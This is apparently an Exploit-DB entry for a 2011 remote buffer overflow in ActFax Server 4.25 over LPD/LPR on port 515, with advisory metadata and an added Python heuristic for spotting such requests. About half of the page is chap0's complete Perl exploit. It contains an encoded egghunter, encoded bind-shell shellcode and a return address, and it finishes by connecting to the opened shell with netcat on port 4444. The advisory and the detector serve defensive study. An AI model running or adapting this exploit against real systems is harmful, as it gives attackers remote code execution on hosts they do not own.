Vendor: ActFax Server
By: chap0
CVSS: 9.3 (HIGH)
CWE: CWE-119 (Buffer Overflow)
Product Name: ActFax Server
Affected Version From: 4.25, Build 0221 (2010-02-11)
Affected Version To: 4.25, Build 0221 (2010-02-11)
Patch Exists: YES
Related CWE: N/A
CPE: actfax_setup_en.exe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
Year: 2011

ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit

ActFax Server is vulnerable to a remote buffer overflow. The overflow is triggered when a malicious request is sent to the server over the LPD/LPR protocol (TCP port 515). The payload contains an EDI-aligned, alphanumerically encoded egghunter followed by the shellcode it locates, which is then executed on the vulnerable system. This vulnerability was discovered by chap0 in 2011 and affects ActFax Server version 4.25, Build 0221 (2010-02-11).

Mitigation:

The vendor has released a patch to address this vulnerability.
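As an added, detection-side example (not part of the advisory or the original exploit), the following Python heuristic inspects the first message a client sends to an LPD/LPR listener on TCP/515 and flags the request shape described above; it generalises to any oversized or non-RFC-1179 first line, not only the published one. The thresholds, sample inputs and function name are assumptions made for this example.

```python
# Added detection-side example (not part of the advisory or chap0's exploit):
# classify the first message a client sends to an LPD/LPR listener on TCP/515.
# RFC 1179 frames every daemon command as one command byte (0x01-0x05), ASCII
# operands and a terminating LF; the exploit on this page instead opens with
# "A", a 256-byte field, a return address and the "w00tw00t" egg tag.
# Thresholds and samples below are constructed assumptions, not advisory data.

LPD_COMMANDS = {0x01, 0x02, 0x03, 0x04, 0x05}   # RFC 1179 daemon command bytes
MAX_FIRST_LINE = 256                           # overflow field length from the advisory
EGG_TAG = b"w00tw00t"                          # egg tag used by the published exploit


def classify_lpd_request(data: bytes) -> dict:
    """Return {"verdict": ..., "findings": [...]} for one client request."""
    findings = []
    if not data:
        return {"verdict": "empty", "findings": findings}
    first_line, lf, _rest = data.partition(b"\n")
    if data[0] not in LPD_COMMANDS:
        findings.append("first byte 0x%02x is not an LPD command" % data[0])
    if not lf:
        findings.append("first line is not LF-terminated")
    if len(first_line) >= MAX_FIRST_LINE:
        findings.append("first line is %d bytes (>= %d)" % (len(first_line), MAX_FIRST_LINE))
    if any(b < 0x20 or b > 0x7E for b in first_line[1:]):
        findings.append("non-printable bytes in command operands")
    if EGG_TAG in data:
        findings.append("egghunter tag present")
    verdict = "exploit-like" if findings else "benign-looking"
    return {"verdict": verdict, "findings": findings}


# Constructed samples: a normal "receive printer job" request for queue "lp",
# and a request shaped like the overflow (padding plus egg tag, no shellcode).
BENIGN_SAMPLE = b"\x02lp\n"
OVERFLOW_SAMPLE = b"A" * 300 + EGG_TAG + b"ZZZZ"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("overflow", OVERFLOW_SAMPLE)):
        result = classify_lpd_request(sample)
        print(name, result["verdict"], "; ".join(result["findings"]))
```

A network sensor or the listener itself can apply the same check before the request reaches the parser; a hit on the egg tag alone is a strong indicator, while the length and framing checks catch variants that use a different tag.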

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends

print "\nActFax Server LPD/LPR Remote Buffer Overflow\n";
print " chap0 - www.seek-truth.net \n\n";

use IO::Socket;

print "Target Address Please: ";
chomp($target = <STDIN>);
 
my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '515', Proto => 'tcp');

print "Connecting. . .\n";

# egghunter EDI encoded
my $eggedi="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIrFOqZjyo4O1RPRrJwrShXMvNuluUBzBTJOoH2Wtpp0PtLKxzlorUYzlo2UHgKOKWA";


# ./msfpayload windows/shell_bind_tcp LPORT=4444
# alpha2 encoded aligned with edi
my $shellcode="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLyxniWpwpWpSPk9yuVQJr2DLKsb4pLKP".
"RvllKPR4TnksB18VoNWaZvFvQyotqKpnLwLSQSLuRVL5p9QZo4MS1kwKRJPQB67NkrrtPlKBb5l5Qn0NkcpQhK5kpt4BjWqXPPP".
"LKsxdXlKpX7Ps1jsjC5lg9lKdtlKS1N6uaKOvQyPllo1hOTM5QYWEhKPQel46c3M8x7KSMetpuKRpXlKshQ4GqkccVLK6lPKLK0".
"XUL7qN3lKGtlK31jpLIpDEtUt1KSkCQPY0ZpQKOypshaO2zLKTRJKNf1MQx7CWBUPwpaxt7rSebaOSdphpLPwDfUWkOXUx8npwq".
"uPWp7Yo4cdPPrH5ymPbKWpKOJupPrpbp2p70pPcppPaxxjvoyOKPYoYEmYO7VQkkpSphUReP4QqLoyxf1zFpPVsgcXkrIKVWPgK".
"O8Uccv7rHMgYydx9o9oJubsrs2wbHD4Xl7Km1KOXU67OyZgU81eRN2mU1KOJuRHpcpmU4GpOykS2wv7qGdqHvsZgbV9SfIrKMqv".
"jgW4TdWLEQUQLMstWTvpo6ePw42tpPrvqF1FG6PVrnSfV6pS2vsXqizlUoovkOHUmYkPpNRvQVIotpph7xmWwmSPKON5oKJPH5M".
"rSfu8LfmEMmmMKOiEgL363LgzMPkKkPsEWumk0G230rporJEPPSKOHUgzA";


my $payload1 = "A" . $eggedi . "\x7D" x (256-length($eggedi));
my $addy = "\x7D\x4B\x4A\x00" ;# --> pop EDI/ pop ESI/ pop EBP/ pop EBX/ pop ECX/ retn
my $payload2 = "w00tw00t" . $shellcode;

my $payloads = $payload1.$addy.$payload2;

print $sock $payloads;

 
print "DONE shell in a moment. . .\n";

$connect = "nc -vvn $target 4444";

system $connect